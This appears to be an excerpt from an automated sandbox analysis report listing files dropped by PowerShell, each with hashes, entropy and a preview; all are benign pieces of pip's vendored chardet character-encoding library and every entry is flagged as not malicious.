                                                                                                                                                                                                                              SHA1:20549A1DE13DA32D0DC72DCF3303C1E94B376219
                                                                                                                                                                                                                              SHA-256:DC75C768B40F34019C5E726390825FA333592D3BD32667F85B90308BACD144A7
                                                                                                                                                                                                                              SHA-512:6027300DAE558169E54B5491CFB8F09F3EA16E8728129E2E0A7B4CB2A209EA8E9D961A4C2FEE57D6F4328C1ED826DD221EF0F5E49B84BD3171B922BF114DC790
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from pip._vendor.chardet.sbcharsetprober import SingleByteCharSetModel..# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..HEBREW_LANG_MODEL = {. 50: { # 'a'. 50: 0, # 'a'. 60: 1, # 'c'. 61: 1, # 'd'. 42: 1, # 'e'. 53: 1, # 'i'. 56: 2, # 'l'. 54: 2, # 'n'. 49: 0, # 'o'. 51: 2, # 'r'. 43: 1, # 's'. 44: 2, # 't'. 63: 1, # 'u'. 34: 0, # '\xa0'. 55: 0, # '.'. 48: 0, # '.'. 39: 0, # '.'. 57: 0, # '.'. 30: 0, # '.'. 59: 0, # '.'. 41: 0, # '.'. 33: 0, # '.'. 37: 0, # '.'. 36: 0, # '.'. 31: 0, # '.'. 29: 0, # '.'. 35: 0, # '.'. 62: 0, # '.'. 28: 0, # '.'. 38: 0, # '.'. 45: 0, # '.'. 9: 0, # '.'. 8: 0, # '.'. 20: 0, # '.'. 16: 0, # '.'. 3: 1, # '.'. 2: 0, # '.'. 24: 0, # '.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):101363
                                                                                                                                                                                                                              Entropy (8bit):3.134629318044249
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:R8Do+PPz8n9nkDCC6gbDibWAp30fbH4Fha9YCnP0azyUCx6+U08amh1NNEbSgmWq:FMv
                                                                                                                                                                                                                              MD5:712B7A91F1F23141E96E9836AB6E7B2F
                                                                                                                                                                                                                              SHA1:900682F8726A2CC1F3628C41EB5546E56EFB9C62
                                                                                                                                                                                                                              SHA-256:5B16DE408C64BFC62D02988DAB141CBE3FAD33272CA08E17CBE7F09031E93FF6
                                                                                                                                                                                                                              SHA-512:CEEDB7B36DF5EF272CDBBEF50B7F548D051BE436792EF4875609A9C0DD9ED8B315512B6335A56E1CB2B17E7C5E7E93519FA08805BD780DCEFEADE0117097F1E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from pip._vendor.chardet.sbcharsetprober import SingleByteCharSetModel..# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..HUNGARIAN_LANG_MODEL = {. 28: { # 'A'. 28: 0, # 'A'. 40: 1, # 'B'. 54: 1, # 'C'. 45: 2, # 'D'. 32: 1, # 'E'. 50: 1, # 'F'. 49: 2, # 'G'. 38: 1, # 'H'. 39: 2, # 'I'. 53: 1, # 'J'. 36: 2, # 'K'. 41: 2, # 'L'. 34: 1, # 'M'. 35: 2, # 'N'. 47: 1, # 'O'. 46: 2, # 'P'. 43: 2, # 'R'. 33: 2, # 'S'. 37: 2, # 'T'. 57: 1, # 'U'. 48: 1, # 'V'. 55: 1, # 'Y'. 52: 2, # 'Z'. 2: 0, # 'a'. 18: 1, # 'b'. 26: 1, # 'c'. 17: 2, # 'd'. 1: 1, # 'e'. 27: 1, # 'f'. 12: 1, # 'g'. 20: 1, # 'h'. 9: 1, # 'i'. 22: 1, # 'j'. 7: 2, # 'k'. 6: 2, # 'l'. 13: 2, # 'm'. 4: 2, # 'n'. 8: 0, # 'o'.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):128035
                                                                                                                                                                                                                              Entropy (8bit):3.441528863585147
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:t0RRnoENBU6imohUZm6Whzs8M3AwuiZLhOuaSVg3cNL9Y/UfG95Hlkbd2yZsRTvc:IAXzEPCBuZ
                                                                                                                                                                                                                              MD5:F1DC1162049E7BB32D47E1AE28B7B22F
                                                                                                                                                                                                                              SHA1:6407B97FD247383D48C520FB1259CADB75BF2204
                                                                                                                                                                                                                              SHA-256:B37F796D367CEC4493AD908E7605DB12367D3F58863F00A5FFCC52B1A73F0CB6
                                                                                                                                                                                                                              SHA-512:007DB599EA21C78DBFC71004C7523418CF9593DADFEFCE46D041FE58841C47B4F86C397E57FC5CD021CE73BEBC73A2CF8802992D8545E486BFDAD9DBD6A08448
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from pip._vendor.chardet.sbcharsetprober import SingleByteCharSetModel..# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..RUSSIAN_LANG_MODEL = {. 37: { # '.'. 37: 0, # '.'. 44: 1, # '.'. 33: 1, # '.'. 46: 1, # '.'. 41: 1, # '.'. 48: 1, # '.'. 56: 1, # '.'. 51: 1, # '.'. 42: 1, # '.'. 60: 1, # '.'. 36: 1, # '.'. 49: 1, # '.'. 38: 1, # '.'. 31: 2, # '.'. 34: 1, # '.'. 35: 1, # '.'. 45: 1, # '.'. 32: 1, # '.'. 40: 1, # '.'. 52: 1, # '.'. 53: 1, # '.'. 55: 1, # '.'. 58: 1, # '.'. 50: 1, # '.'. 57: 1, # '.'. 63: 1, # '.'. 62: 0, # '.'. 61: 0, # '.'. 47: 0, # '.'. 59: 1, # '.'. 43: 1, # '.'. 3: 1, # '.'. 21: 2, # '.'. 10: 2, # '.'. 19: 2, # '.'. 13: 2, # '.'.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):102774
                                                                                                                                                                                                                              Entropy (8bit):3.260404337094394
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:9O4yRslJrHAeANp4vS6g47Wbq0fMmRNndxvlS0rqXiME71+aMZ2ZIwMbdJ7Hh4Ar:hl
                                                                                                                                                                                                                              MD5:7DDB0814BC6618355A6D8803EB87F83D
                                                                                                                                                                                                                              SHA1:C55FC8A1DF9BF4EB03EB664AB28916EE13962AA7
                                                                                                                                                                                                                              SHA-256:EDB265422B51A539D51800666D2CE71E72703870F2DC89E44EFB45531D775902
                                                                                                                                                                                                                              SHA-512:966F8010DB0167152AF74F16BFCD9D1952FB2188F202409DC59645978823F9A35CD9C24D85AAC45265B29AB4EC996C941834DE1F9D4A1EA4DA6C36F04BB29061
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from pip._vendor.chardet.sbcharsetprober import SingleByteCharSetModel..# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..THAI_LANG_MODEL = {. 5: { # '.'. 5: 2, # '.'. 30: 2, # '.'. 24: 2, # '.'. 8: 2, # '.'. 26: 2, # '.'. 52: 0, # '.'. 34: 1, # '.'. 51: 1, # '.'. 47: 0, # '.'. 58: 3, # '.'. 57: 2, # '.'. 49: 0, # '.'. 53: 0, # '.'. 55: 0, # '.'. 43: 2, # '.'. 20: 2, # '.'. 19: 3, # '.'. 44: 0, # '.'. 14: 2, # '.'. 48: 0, # '.'. 3: 2, # '.'. 17: 1, # '.'. 25: 2, # '.'. 39: 1, # '.'. 62: 1, # '.'. 31: 1, # '.'. 54: 0, # '.'. 45: 1, # '.'. 9: 2, # '.'. 16: 1, # '.'. 2: 3, # '.'. 61: 2, # '.'. 15: 3, # '.'. 12: 3, # '.'. 42: 2, # '.'.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):95372
                                                                                                                                                                                                                              Entropy (8bit):3.0564322363334697
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:ZsaLEatMa6ca66a7DSpuFbbY9VMJuXaa+a1HaZiiviPaDxiPNn+0iyKaA0i47aW3:/bU/4Ye0FbPIGwuNrhz0hv5XJs
                                                                                                                                                                                                                              MD5:47EF8726F2D7D83347271DD93808BE26
                                                                                                                                                                                                                              SHA1:D9268889827089DD399EFE5F7A42E9CD6A540209
                                                                                                                                                                                                                              SHA-256:5D8D1E19D4C8CB8790F578352D53D969C6FE501847051F9CAB42293D51E8C0A7
                                                                                                                                                                                                                              SHA-512:75E656D3CE96810F02C26E4229F4CAEA5212FD8761E0D985210E2B264E3E2F05D1FBA9E32EF12F2652E91A936A3E65BC5EB7D19568DB0A7E528113BA2AAD39E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from pip._vendor.chardet.sbcharsetprober import SingleByteCharSetModel..# 3: Positive.# 2: Likely.# 1: Unlikely.# 0: Negative..TURKISH_LANG_MODEL = {. 23: { # 'A'. 23: 0, # 'A'. 37: 0, # 'B'. 47: 0, # 'C'. 39: 0, # 'D'. 29: 0, # 'E'. 52: 0, # 'F'. 36: 0, # 'G'. 45: 0, # 'H'. 53: 0, # 'I'. 60: 0, # 'J'. 16: 0, # 'K'. 49: 0, # 'L'. 20: 0, # 'M'. 46: 0, # 'N'. 42: 0, # 'O'. 48: 0, # 'P'. 44: 0, # 'R'. 35: 0, # 'S'. 31: 0, # 'T'. 51: 0, # 'U'. 38: 0, # 'V'. 62: 0, # 'W'. 43: 0, # 'Y'. 56: 0, # 'Z'. 1: 3, # 'a'. 21: 0, # 'b'. 28: 0, # 'c'. 12: 2, # 'd'. 2: 3, # 'e'. 18: 0, # 'f'. 27: 1, # 'g'. 25: 1, # 'h'. 3: 1, # 'i'. 24: 0, # 'j'. 10: 2, # 'k'. 5: 1, # 'l'. 13: 1, # 'm'. 4: 1, # 'n'.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5380
                                                                                                                                                                                                                              Entropy (8bit):4.775411082166521
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Ptzcu4j367IXMmmmmmOmmmmmmJmmmmmmcmJxBeYAJbP+1mIuIZy5:Ptzcu4WxxBlATPF5
                                                                                                                                                                                                                              MD5:9612208D7B61D2FEA4FE0A6095E6A2A2
                                                                                                                                                                                                                              SHA1:3030546391E18D95775EB79565B10FA7B00AEAE0
                                                                                                                                                                                                                              SHA-256:A75E4412615B9905306CA2C2EE53895461C4670706E39B9B1196131AED352798
                                                                                                                                                                                                                              SHA-512:10EC9DFB1C327A766D5A7A3B7ECB691CFB3A01235D77BEFF32C03125094BBA343316CB84B8F179A6FE943AFFBD387AA58ADFEC12EB1C890BD59BF192E04A660A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6077
                                                                                                                                                                                                                              Entropy (8bit):4.828775452408909
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ntzWu4j1XN5WmmmmmcmmmmmmfmmmmmmymSMS7TGtJb2ye+LmIuI0y5:ntzWu4pPJMSvGDCLZg5
                                                                                                                                                                                                                              MD5:3C23BC2FC8F31F09F55A02CA340524F7
                                                                                                                                                                                                                              SHA1:6DB32E502194E4B983608B778E096EC59A7E7103
                                                                                                                                                                                                                              SHA-256:F5A9DFCE663A4C17D43C3C810CE758D3B92A9931E9675B4AD232FEA7525670E6
                                                                                                                                                                                                                              SHA-512:A8935BFFA79B39B93987036114C1545B90F073541134FF0029B7B00D5E447E40F48F218ACEACEF3A6844A83BD6EDD04074983C93B04F3B88753DC8727500F6F0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# This code was modified from latin1prober.py by Rob Speer <rob@lumino.so>..# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Rob Speer - adapt to MacRoman encoding.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GN
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3715
                                                                                                                                                                                                                              Entropy (8bit):4.712163613459709
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Px/zeL0uwyUjHSSz6PYJJMu3KQ6H5RGMyoqEqKBqXMM79cIIGu:Ptz/u4/mPYJJMm6HmZoqEq+gMM7iIIGu
                                                                                                                                                                                                                              MD5:704EE40BAE0167B7307B256D5A5DBDEB
                                                                                                                                                                                                                              SHA1:3D976B82E12FEF50269BD14297CBE75BDF4885EF
                                                                                                                                                                                                                              SHA-256:5ABD3858D2381775FF57112F7AB346F87DB983BBBE3030CA94DB7E2468FEFEE5
                                                                                                                                                                                                                              SHA-512:C088CED518577F97441CEF1EFDED45610B5FDC63214228931969A2674E6FA0A2CBD9DC58AA644249A6D79DB6E9671B234C973FF4AFECB994F3BCCEB0F7ADC99A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.# Proofpoint, Inc..#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2131
                                                                                                                                                                                                                              Entropy (8bit):4.949822754481011
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Px/zeL0uwyUjHSVwMCglb8L4ybUVJsuNcnv:Ptz/u4pK9Jsaov
                                                                                                                                                                                                                              MD5:E553887AE463CCFD2A7FC492117B4908
                                                                                                                                                                                                                              SHA1:CA909828A090C1AE1ACC7EBF47D357052CED7312
                                                                                                                                                                                                                              SHA-256:891A5A3418D5D0337060FBBFCFA4E21E0469C186A188CEF3B48FF8919E14CFD0
                                                                                                                                                                                                                              SHA-512:A0DAA66E9274D71F8DED7BF908C7DC7C1A1A0DB506BFD274AAFF50BA56792F294385C067597F49F7BE69615FCA74BD7402E7E218AF60953A64BF2AD8F5976333
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.# Proofpoint, Inc..#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30391
                                                                                                                                                                                                                              Entropy (8bit):4.571223418642341
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Kt17u4aEcLGZ9G///8/eeeeeHN999999LzV4ohG/96U////////9eeeeeeeea/9u:6u48fRfju6Xz+fjO/B3Ravwphxy
                                                                                                                                                                                                                              MD5:C3FB17A55D09B7D6A8CD9A4EB8DF9553
                                                                                                                                                                                                                              SHA1:9269C5593AE1CFEB29626D990C5A63384DE67163
                                                                                                                                                                                                                              SHA-256:854B4FBC3620583680D9D59D80BB2C85BC117E6DD0E5846546881D99E454350C
                                                                                                                                                                                                                              SHA-512:14467D3CF70E81BEBA94B5AEA9D7F167273AEDAD8A2D44FC1D62FD71ED82DAB54A9CB29F63F3030C2A794B381E6BFF5C336FB93CC5E4E59B8DD30A952CE17FED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.6509074237050765
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:oxWOlllVO8l4EuWAuFK5VcK85kdVWrzLUhKBzB0K9iyRj6cRwIaQHtgem/l:gl/VneE+uw52KNdAreat04b6Iaatgemt
                                                                                                                                                                                                                              MD5:7276928087011E9E7F71491D19926915
                                                                                                                                                                                                                              SHA1:36CD0ED2E999AB9BBA4AE4FE2A1A6E9CF6A7548A
                                                                                                                                                                                                                              SHA-256:D15462C6FBAFCFB1B9D3750272FCB6F8C79ACFCB1F6BE3C83105A7937755294C
                                                                                                                                                                                                                              SHA-512:B1AA935D44DF235AFB9CC71526BE97AC54452DDA06E6F95AC5C3C8F5F206291103693F7D53E518989590FC6C4703122EBC0285EEB8882A591C92A97FA25A9C6A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................y.).N..r..........VC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/chardet/metadata/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9738
                                                                                                                                                                                                                              Entropy (8bit):6.6134271019148265
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:uPUz7OWAdvRCoU25rSg3XeW0G5zoLowv+avfvQHHIDCoPMMTFF:uXvX95G4XD0IzeoPHHIDVF
                                                                                                                                                                                                                              MD5:9EC69DAB927AF728F8CAD2AE3F8D2C42
                                                                                                                                                                                                                              SHA1:BBE72BB24BA8935E0D10D8155F680DDB1A04D369
                                                                                                                                                                                                                              SHA-256:751E5295C937C823101FBFB77AD7B2FE006A5893C521715A0B4283D0115A3A66
                                                                                                                                                                                                                              SHA-512:4FCD8D5676A61D7D6D88C44BCD11B38BF47FCA5AA8C0863668AEAFE1703E926BD902C614866EC8CADD62D9FDD64291DB6A1C152337D29AF0A264B8EEE59510B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.4........................^.....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.....G.d...d.........Z.i.d...e.d.d.d.g.d...d.d.g.............d...e.d.d.d.g.d...d.d.g.............d...e.d.d.d.g.d...d.d.g.............d...e.d.d.d.d.d.g.d.d.g.............d...e.d.d.d.g.d ..d!d"g.............d#..e.d#d$d.g.d ..d%d&g.............d'..e.d'd(d.d)d*g.d+d,g.............d-..e.d-d.d.g.d/..d0g..1..........d2..e.d2d3d.d4g.d5d6g.............d7..e.d7d8d.g.d ..d9d:g.............d;..e.d;d<d.g.d=..d>d?g.............d@..e.d@dAd.g.d ..dBdCg.............dD..e.dDdEd.g.d ..dFdGdHg.............dI..e.dIdJd.dKdLg.dMdNg.............dO..e.dOdPd.d.d.g.dQdRg.............dS..e.dSdTd.d.d.g.dUdVg.............dW..e.dWdXd.g.d ..dYdZg...............e.d[d\d.g.d]..d^d_g.............e.d`dad.g.d]..dbdcg.............e.ddded.g.df..dgdhg.............e.didjd.g.d/..dkg..1..........e.dldmd.d.d.g.dndog.............e.dpdqd.g.d ..drdsg.............e.dtdud.d.d.g.dvdwg.............e.dxdyd.g.dz..d{d|g.............e.d}d~d.d.d.g.d.d.g.............e.d.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13560
                                                                                                                                                                                                                              Entropy (8bit):5.536384591834413
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:yWPBTwEHCiPSmf+Uub1cktR4VhaV+zvl+i0SXTSH2lDKFyqDak2NmpUqH1cGVupt:k6d0eeivD0kuWEzWkFVzMcAcQSTxh0
                                                                                                                                                                                                                              MD5:39C3F5BCBEB5419B86614A828E32EC70
                                                                                                                                                                                                                              SHA1:A2E83AED7C5536CBAA0D01FA7B5AE29FD3F57B49
                                                                                                                                                                                                                              SHA-256:161BC121D645C5143E753C246FFD2669D44A815042694310CFD239C6A8C4E624
                                                                                                                                                                                                                              SHA-512:83B39C8E0978F59AED665926E2C070E4318A7F0C4305D6092D4627AFD9FDA79D0AD65A0E5F6E503F8BB4C34EB5BC5867A138D85F4E9B7712A84E1DF73722F71D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".Metadata about languages used by our model training code for our.SingleByteCharSetProbers. Could be used for other things in the future...This code is based on the language metadata from the uchardet project.."""..from string import ascii_letters.from typing import List, Optional..# TODO: Add Ukrainian (KOI8-U)...class Language:. """Metadata about a language useful for training models.. :ivar name: The human name for the language, in English.. :type name: str. :ivar iso_code: 2-letter ISO 639-1 if possible, 3-letter ISO code otherwise,. or use another catalog as a last resort.. :type iso_code: str. :ivar use_ascii: Whether or not ASCII letters should be included in trained. models.. :type use_ascii: bool. :ivar charsets: The charsets we want to support and create data for.. :type charsets: list of str. :ivar alphabet: The characters in the language's alphabet. If `use_ascii` is. `True`, you onl
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):402
                                                                                                                                                                                                                              Entropy (8bit):4.77516875090946
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYBd6e9povticsBELPpYYB95ToXItrJHgvQ:1REO6eSGELxYuVoYt1AvQ
                                                                                                                                                                                                                              MD5:78BB065706282AF36231E4BCF9139FAF
                                                                                                                                                                                                                              SHA1:7B83ACD79F97687E9C95BC238AE8FF8DCA34C9D7
                                                                                                                                                                                                                              SHA-256:7B3E0546F37929A4A8B09789D96CD4C8A743760DF91C3CBF4922CF5CA09DB793
                                                                                                                                                                                                                              SHA-512:8B3573B9AC9E44CAE21DFD193DC854462CD4ED9A5F45EF0AAF952818FBAD79083005AE2D086894C90D1EB2F10552C3BCA4BDAAB9982A6A43D492B11215D609B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import TYPE_CHECKING, Optional..if TYPE_CHECKING:. # TypedDict was introduced in Python 3.8.. #. # TODO: Remove the else block and TYPE_CHECKING check when dropping support. # for Python 3.7.. from typing import TypedDict.. class ResultDict(TypedDict):. encoding: Optional[str]. confidence: float. language: Optional[str]..else:. ResultDict = dict.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6400
                                                                                                                                                                                                                              Entropy (8bit):4.600207105357633
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Ptzcu4oGdkGftEJHv40otqQlHaWX8n9DcII/w9Z4R:Ptzcu4oQtsgZaJn5cuc
                                                                                                                                                                                                                              MD5:ADDA0D0C94300780614BE44925BC0549
                                                                                                                                                                                                                              SHA1:767171B061A50044B3C07F4C51E1BAD22AEEA5D5
                                                                                                                                                                                                                              SHA-256:FA777717DD22EC6A572E37A12D51EA5411342A55B31AF4143C44CB04D9F8A3A5
                                                                                                                                                                                                                              SHA-512:69F77FEDD078D1E42A6E2785DDBC6B30DDFDFC2B90335C84AFDD9ED9E5CAB782884E77FC9FE578BDCBAA2529024BF7513284F035729A24342210336D2127E40E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4137
                                                                                                                                                                                                                              Entropy (8bit):5.098263689577735
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Ptzcu4h3LCKCFEXVz1LxZSEJsmJ4PXFSKqlSiMqIBx7lO1F19d:Ptzcu4h3+BMVz1LxksUFSKqlSiMqIBxc
                                                                                                                                                                                                                              MD5:BEAF119D56F17FCCB4BC5947FBB724FE
                                                                                                                                                                                                                              SHA1:F7ECDFDF091ECC6BB64CFEFC8A584E16A4599EDC
                                                                                                                                                                                                                              SHA-256:81C808D1F39F830FF76130A5A5BADAFCC371C321322777945EB6A82C761BE7D1
                                                                                                                                                                                                                              SHA-512:2E45EF6AC4B74C2074F722B4268AFC2C9C383A29D95BA05B41E7DAD339FF2AE7C5F1BE77AAC9CF1CFFBB49DCFA9DCBB3E86F5251DAF87B2A0F0974EB9015B1AA
                                                                                                                                                                                                                              Malicious:false
